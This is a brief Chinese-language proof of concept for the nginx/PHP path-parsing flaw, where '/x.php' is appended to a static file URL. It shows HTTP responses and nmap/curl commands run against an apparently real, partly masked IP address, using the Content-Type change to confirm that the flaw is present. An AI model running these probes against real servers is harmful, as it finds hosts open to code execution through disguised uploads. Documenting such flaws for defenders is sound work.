Please Check your server.

Poc:

访问 http://testsite/robots.txt

HTTP/1.1 200 OK

Server: nginx/0.6.32

Date: Thu, 20 May 2010 10:05:30 GMT

Content-Type: text/plain

Content-Length: 18

Last-Modified: Thu, 20 May 2010 06:26:34 GMT

Connection: keep-alive

Keep-Alive: timeout=20

Accept-Ranges: bytes

访问 http://testsite/robots.txt/80sec.php

HTTP/1.1 200 OK

Server: nginx/0.6.32

Date: Thu, 20 May 2010 10:06:49 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Keep-Alive: timeout=20

X-Powered-By: PHP/5.2.6

其中的Content-Type的变化说明了后端负责解析的变化，该站点就可能存在漏洞。

演示:

pentest@ubuntu:~$ nmap -sV -p 80 218.xx.xx.205

Interesting ports on 218.xx.xx.205:

PORT   STATE SERVICE VERSION80/tcp open  http    nginx web server 0.8.15

pentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png -# | grep  “Content-Type”

0.0%Content-Type: image/pngpentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png/test.php -# | grep  “Content-Type”

Content-Type: text/html

Reference:

[1]http://hi.baidu.com/yuange1975/blog/item/4c223031a6727eaf5edf0e46.html[2]http://www.laruence.com/2010/05/20/1495.html